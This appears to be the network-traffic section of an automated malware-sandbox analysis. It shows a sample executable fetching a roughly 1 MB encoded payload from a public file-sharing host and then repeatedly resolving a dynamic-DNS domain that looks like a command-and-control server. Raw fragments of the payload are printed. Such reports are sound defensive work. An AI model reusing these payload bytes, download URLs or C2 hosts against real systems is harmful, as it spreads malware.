                                      Dec 17, 2024 19:47:04.562736988 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.565463066 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.565529108 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.565536022 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.567809105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.567867041 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.567873001 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.570197105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.570256948 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.570261955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.572547913 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.572618008 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.572623014 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.575464964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.575537920 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.575542927 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.577785969 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.577852964 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.577857018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.579772949 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.579837084 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.579840899 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.582659960 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.582731009 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.582735062 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.584942102 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.585005045 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.585010052 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.631974936 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.739470959 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.739483118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.739547968 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.739557028 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741605997 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741615057 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741666079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.741674900 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744220018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744230986 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744292021 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.744297981 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746145010 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746193886 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746201992 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.746215105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746237993 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.748370886 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.748421907 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.748429060 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.750754118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.750809908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.750817060 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.752722025 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.752775908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.752780914 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.754874945 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.754930019 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.754935026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.757452965 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.757512093 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.757519007 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.759849072 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.759906054 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.759915113 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.761751890 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.761814117 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.761821032 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.763926983 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.764005899 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.764012098 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.766472101 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.766525030 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.766534090 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.768898964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.768984079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.768990040 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.770653009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.770710945 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.770715952 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.772895098 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.772965908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.772972107 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.823978901 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932356119 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.932388067 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.932439089 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932486057 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932491064 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933851004 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933906078 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933918953 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.933959961 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933989048 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.936378002 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.936448097 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.936455011 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.938337088 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.938407898 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.938412905 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.940406084 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.940471888 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.940478086 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.942914963 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.942984104 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.942989111 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.944967031 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.945034027 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.945039034 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.947011948 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.947074890 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.947079897 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.949482918 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.949561119 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.949567080 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.951632023 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.951700926 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.951705933 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.953906059 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.953984976 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.953989983 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.955960989 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.956023932 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.956028938 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.958446026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.958511114 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.958515882 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.960473061 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.960537910 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.960542917 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.962675095 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.962738037 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.962743044 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.965128899 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.965187073 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.965193033 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.016004086 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.125463009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.125473976 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.125566006 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.125574112 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128582001 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128590107 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128664970 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.128670931 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130496979 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130505085 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130559921 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.130564928 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132332087 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132374048 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132390022 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.132395029 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132417917 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.134637117 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.134687901 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.134694099 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.136825085 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.136884928 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.136889935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.138823986 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.138883114 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.138887882 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.140485048 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.140537977 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.140542984 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.142347097 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.142405987 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.142410994 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.144304991 CET4434970823.237.50.106192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 19:47:00.802445889 CET | 63230 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 19:47:01.233530045 CET | 53 | 63230 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 19:47:07.687659979 CET | 55025 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 19:47:08.015021086 CET | 53 | 55025 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 19:48:15.654836893 CET | 56323 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 19:48:15.977806091 CET | 53 | 56323 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 19:49:23.749764919 CET | 51343 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 19:49:24.070266008 CET | 53 | 51343 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 19:50:31.953363895 CET | 51564 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 19:50:32.268501997 CET | 53 | 51564 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 19:47:00.802445889 CET | 192.168.2.6 | 1.1.1.1 | 0xcf1b | Standard query (0) | 1010.filemail.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:47:07.687659979 CET | 192.168.2.6 | 1.1.1.1 | 0x5d17 | Standard query (0) | hafiznor3374.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:48:15.654836893 CET | 192.168.2.6 | 1.1.1.1 | 0xab35 | Standard query (0) | hafiznor3374.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:49:23.749764919 CET | 192.168.2.6 | 1.1.1.1 | 0x3b63 | Standard query (0) | hafiznor3374.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:50:31.953363895 CET | 192.168.2.6 | 1.1.1.1 | 0xd650 | Standard query (0) | hafiznor3374.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 19:47:01.233530045 CET | 1.1.1.1 | 192.168.2.6 | 0xcf1b | No error (0) | 1010.filemail.com | ip.1010.filemail.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 19:47:01.233530045 CET | 1.1.1.1 | 192.168.2.6 | 0xcf1b | No error (0) | ip.1010.filemail.com | (none) | 23.237.50.106 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:47:08.015021086 CET | 1.1.1.1 | 192.168.2.6 | 0x5d17 | No error (0) | hafiznor3374.duckdns.org | (none) | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:48:15.977806091 CET | 1.1.1.1 | 192.168.2.6 | 0xab35 | No error (0) | hafiznor3374.duckdns.org | (none) | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:49:24.070266008 CET | 1.1.1.1 | 192.168.2.6 | 0x3b63 | No error (0) | hafiznor3374.duckdns.org | (none) | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 19:50:32.268501997 CET | 1.1.1.1 | 192.168.2.6 | 0xd650 | No error (0) | hafiznor3374.duckdns.org | (none) | 192.169.69.26 | A (IP address) | IN (0x0001) | false
                                      • 1010.filemail.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49708 | 23.237.50.106 | 443 | 768 | C:\Users\user\Desktop\MeP66xi1AM.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 18:47:03 UTC | 278 | OUT | GET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                      Host: 1010.filemail.com
2024-12-17 18:47:03 UTC | 339 | IN | HTTP/1.1 200 OK
                                      Content-Length: 1082036
                                      Content-Type: application/octet-stream
                                      Last-Modified: Sun, 15 Dec 2024 11:48:03 GMT
                                      Accept-Ranges: bytes
                                      ETag: 63d5509024e920f6991de1238388cb63
                                      X-Transfer-ID: miynsztpjshogko
                                      Content-Disposition: attachment; filename=233_Wnbcdrjtnox
                                      Date: Tue, 17 Dec 2024 18:47:03 GMT
                                      Connection: close
                                      2024-12-17 18:47:03 UTC8192INData Raw: 63 77 34 78 6a 51 4c 39 39 38 6c 33 34 54 4c 69 61 46 33 64 78 62 36 35 36 38 7a 6e 69 6f 70 33 38 71 7a 41 66 4c 49 50 43 6c 36 78 4d 46 68 4f 4a 4c 4b 43 41 6f 59 69 6d 5a 45 43 46 4f 39 61 48 4d 38 65 4e 67 32 36 71 4b 53 30 41 56 52 53 74 35 48 4b 6e 31 41 54 38 79 4a 52 2b 6a 50 74 54 78 46 6c 57 62 51 65 6f 42 74 65 4f 30 6f 68 57 48 73 44 52 57 2b 4f 46 56 4e 53 50 77 52 36 69 63 73 4c 4a 6d 53 4e 63 49 42 75 5a 64 39 59 48 35 31 6c 44 37 6a 4d 50 6a 4b 53 52 33 37 4e 5a 4e 66 7a 32 4f 62 33 75 52 44 65 52 6e 74 56 75 46 6c 35 6a 62 41 41 43 73 6a 4d 35 61 5a 43 33 79 6a 34 7a 70 35 67 56 74 7a 32 49 49 42 33 77 48 53 66 37 34 71 43 34 52 38 46 67 77 51 74 6b 56 33 65 32 4a 50 6b 70 52 69 76 56 4a 32 77 76 70 47 74 49 5a 2b 4f 62 76 32 32 59 51 79
                                      Data Ascii: cw4xjQL998l34TLiaF3dxb6568zniop38qzAfLIPCl6xMFhOJLKCAoYimZECFO9aHM8eNg26qKS0AVRSt5HKn1AT8yJR+jPtTxFlWbQeoBteO0ohWHsDRW+OFVNSPwR6icsLJmSNcIBuZd9YH51lD7jMPjKSR37NZNfz2Ob3uRDeRntVuFl5jbAACsjM5aZC3yj4zp5gVtz2IIB3wHSf74qC4R8FgwQtkV3e2JPkpRivVJ2wvpGtIZ+Obv22YQy
                                      2024-12-17 18:47:03 UTC8192INData Raw: 45 2b 64 41 73 39 53 66 35 42 42 37 51 4a 4c 57 78 49 66 68 76 59 50 6c 57 37 48 73 58 38 66 4f 57 77 50 65 79 41 42 2b 54 4d 77 74 4e 49 46 6b 33 59 47 61 47 62 47 53 4a 2f 49 6d 35 4a 63 79 47 56 75 51 45 4b 45 4a 34 68 64 6f 76 6f 70 63 4d 50 6f 73 48 31 43 73 6a 4d 4f 44 48 47 44 49 49 6b 76 6a 66 45 31 74 6c 6a 55 51 48 4d 72 41 4c 64 6c 75 4f 52 76 47 47 53 76 73 56 7a 44 68 43 4d 2f 52 31 4e 4d 51 58 53 31 39 6d 55 59 71 39 41 55 53 56 4e 65 2b 6b 45 41 68 34 2f 4c 6b 38 67 4b 72 6e 55 41 65 50 55 45 32 55 65 59 76 32 68 4a 56 4f 4b 2f 72 59 65 76 49 55 6e 75 51 7a 79 72 67 78 4d 4e 65 59 34 30 35 58 35 67 6b 56 36 30 30 71 45 43 37 30 71 43 6e 4f 74 57 33 71 70 31 36 6a 62 43 48 53 58 4f 2b 79 4c 43 67 59 41 63 42 44 4e 50 57 75 52 4b 64 48 2b 70
                                      Data Ascii: E+dAs9Sf5BB7QJLWxIfhvYPlW7HsX8fOWwPeyAB+TMwtNIFk3YGaGbGSJ/Im5JcyGVuQEKEJ4hdovopcMPosH1CsjMODHGDIIkvjfE1tljUQHMrALdluORvGGSvsVzDhCM/R1NMQXS19mUYq9AUSVNe+kEAh4/Lk8gKrnUAePUE2UeYv2hJVOK/rYevIUnuQzyrgxMNeY405X5gkV600qEC70qCnOtW3qp16jbCHSXO+yLCgYAcBDNPWuRKdH+p
                                      2024-12-17 18:47:03 UTC8192INData Raw: 58 77 79 72 54 45 50 32 6e 43 61 72 62 4a 6d 53 4d 45 76 51 39 4a 4e 53 66 4e 6b 32 56 4a 4e 75 6b 65 4f 72 72 34 47 79 4a 69 78 79 4c 6a 6d 4a 6e 32 48 4c 63 7a 72 68 30 77 36 72 57 73 70 74 56 74 76 72 6d 4a 45 36 32 54 4e 33 36 6c 68 67 67 69 59 7a 41 67 55 31 33 78 72 7a 6a 61 78 6e 6b 69 6c 30 70 4d 76 70 71 52 4c 41 78 32 56 2f 72 6c 6b 79 39 63 61 56 4c 53 54 4a 38 4b 30 79 5a 38 57 4e 75 66 55 45 35 4d 76 64 73 38 4b 44 47 7a 45 74 75 50 6b 6b 62 38 6f 78 67 2b 2f 48 63 56 49 5a 45 45 6c 2f 67 32 52 44 55 54 46 48 68 6a 44 68 37 5a 72 62 54 42 50 6d 65 74 31 68 55 4e 72 48 70 33 75 4d 67 43 49 34 68 6d 30 70 70 32 32 74 53 43 30 74 42 59 56 76 43 45 5a 35 6f 52 68 5a 73 75 42 47 65 49 61 70 4f 51 35 53 65 36 55 39 35 6b 55 51 6f 6a 5a 36 64 61 52
                                      Data Ascii: XwyrTEP2nCarbJmSMEvQ9JNSfNk2VJNukeOrr4GyJixyLjmJn2HLczrh0w6rWsptVtvrmJE62TN36lhggiYzAgU13xrzjaxnkil0pMvpqRLAx2V/rlky9caVLSTJ8K0yZ8WNufUE5Mvds8KDGzEtuPkkb8oxg+/HcVIZEEl/g2RDUTFHhjDh7ZrbTBPmet1hUNrHp3uMgCI4hm0pp22tSC0tBYVvCEZ5oRhZsuBGeIapOQ5Se6U95kUQojZ6daR
                                      2024-12-17 18:47:03 UTC8192INData Raw: 6f 59 51 35 49 52 77 45 30 79 42 4e 66 6e 48 47 49 51 6e 4b 32 71 76 43 76 51 4b 4b 4a 44 6a 45 77 58 4a 54 31 31 45 76 6b 4e 52 49 2f 6a 45 72 72 66 35 38 43 4e 73 74 4b 42 76 4b 33 41 34 78 64 68 77 44 72 71 46 4d 41 6d 6c 41 35 6e 30 35 6a 6b 58 76 63 68 51 47 55 43 45 2f 68 76 6d 2f 74 75 69 48 34 46 54 67 70 50 4d 4f 4f 50 51 47 59 51 6c 77 53 70 66 2b 52 45 45 31 70 4b 49 4f 61 36 4a 6e 65 55 50 64 34 6d 67 78 59 6e 2f 63 37 79 53 68 48 69 74 79 77 63 63 38 6e 37 75 49 73 33 74 57 66 52 51 68 35 73 2f 75 62 31 79 31 75 50 32 55 79 59 67 5a 38 4e 78 51 6a 49 6c 42 54 72 65 45 74 5a 47 6e 4a 30 69 41 39 78 43 38 32 5a 62 4b 56 65 57 47 49 55 39 7a 6d 4c 36 6a 64 46 2f 57 64 73 63 49 38 44 65 43 6f 47 4e 6c 57 7a 34 32 67 4f 2f 45 76 6c 6f 58 51 52 4f
                                      Data Ascii: oYQ5IRwE0yBNfnHGIQnK2qvCvQKKJDjEwXJT11EvkNRI/jErrf58CNstKBvK3A4xdhwDrqFMAmlA5n05jkXvchQGUCE/hvm/tuiH4FTgpPMOOPQGYQlwSpf+REE1pKIOa6JneUPd4mgxYn/c7yShHitywcc8n7uIs3tWfRQh5s/ub1y1uP2UyYgZ8NxQjIlBTreEtZGnJ0iA9xC82ZbKVeWGIU9zmL6jdF/WdscI8DeCoGNlWz42gO/EvloXQRO
                                      2024-12-17 18:47:03 UTC8192INData Raw: 54 6b 6d 49 53 32 48 79 68 75 4d 38 7a 64 62 75 49 70 49 67 69 4b 30 69 63 32 77 6e 47 79 70 74 39 65 75 2f 38 6a 39 72 63 52 67 46 75 66 39 38 2f 6e 31 55 4d 56 73 4d 4f 34 49 72 48 54 71 5a 4b 54 58 4b 4c 5a 69 6f 43 52 78 2b 5a 79 6e 6b 31 62 6a 54 4a 69 56 41 61 50 70 55 6f 45 78 7a 55 69 55 70 59 4b 76 77 70 4e 59 67 70 47 53 4b 72 72 4e 68 51 35 59 65 4c 42 2f 36 51 2f 64 38 32 44 4a 6b 7a 76 49 6a 43 74 4a 4d 73 6f 4f 4f 4b 58 75 50 4f 49 64 72 68 70 30 54 66 34 6c 68 53 30 73 6e 7a 64 66 73 49 33 66 73 54 4d 72 73 4f 4a 31 38 6b 56 6c 74 64 4b 4b 76 36 4b 33 5a 6f 62 6a 2f 61 39 72 31 30 61 58 50 47 4e 7a 61 76 30 41 6e 55 77 56 51 57 56 57 54 64 50 33 57 41 2f 33 2b 69 6c 59 30 6a 62 4d 68 76 73 33 76 33 58 33 5a 54 57 4c 53 4d 61 70 36 55 50 49
                                      Data Ascii: TkmIS2HyhuM8zdbuIpIgiK0ic2wnGypt9eu/8j9rcRgFuf98/n1UMVsMO4IrHTqZKTXKLZioCRx+Zynk1bjTJiVAaPpUoExzUiUpYKvwpNYgpGSKrrNhQ5YeLB/6Q/d82DJkzvIjCtJMsoOOKXuPOIdrhp0Tf4lhS0snzdfsI3fsTMrsOJ18kVltdKKv6K3Zobj/a9r10aXPGNzav0AnUwVQWVWTdP3WA/3+ilY0jbMhvs3v3X3ZTWLSMap6UPI
                                      2024-12-17 18:47:04 UTC8192INData Raw: 58 7a 59 55 5a 34 48 56 37 38 71 38 4f 30 6f 6a 7a 67 59 78 4d 58 65 6f 63 68 61 76 54 6b 72 4a 41 62 75 2f 41 53 56 33 75 67 35 67 34 6d 51 4d 44 36 47 32 39 66 51 45 6b 31 6d 78 57 51 49 54 75 41 53 33 57 6d 42 62 4b 49 30 58 36 51 76 74 6b 48 73 2b 77 4f 35 7a 39 6e 37 70 47 6f 30 51 67 72 4a 76 6f 35 64 6e 54 56 32 42 41 63 6e 4d 65 30 7a 79 55 43 79 2f 59 6d 52 5a 4b 58 6d 71 4d 59 73 44 48 70 6d 58 4d 43 45 45 79 6b 54 55 48 4f 4d 59 79 73 43 45 79 48 34 36 78 39 38 48 75 70 6c 77 66 59 30 57 39 2f 52 69 38 78 7a 66 6c 5a 67 47 72 4a 35 56 52 38 69 73 71 49 7a 4e 6c 74 41 6b 4f 64 57 2f 31 51 4e 74 2f 35 48 4a 62 70 44 75 42 43 77 76 71 2b 31 39 42 41 6d 63 61 55 79 6b 42 4b 66 6a 4d 34 55 6c 59 6f 45 6e 4c 33 56 68 52 6a 5a 49 35 49 79 6e 47 37 55
                                      Data Ascii: XzYUZ4HV78q8O0ojzgYxMXeochavTkrJAbu/ASV3ug5g4mQMD6G29fQEk1mxWQITuAS3WmBbKI0X6QvtkHs+wO5z9n7pGo0QgrJvo5dnTV2BAcnMe0zyUCy/YmRZKXmqMYsDHpmXMCEEykTUHOMYysCEyH46x98HuplwfY0W9/Ri8xzflZgGrJ5VR8isqIzNltAkOdW/1QNt/5HJbpDuBCwvq+19BAmcaUykBKfjM4UlYoEnL3VhRjZI5IynG7U
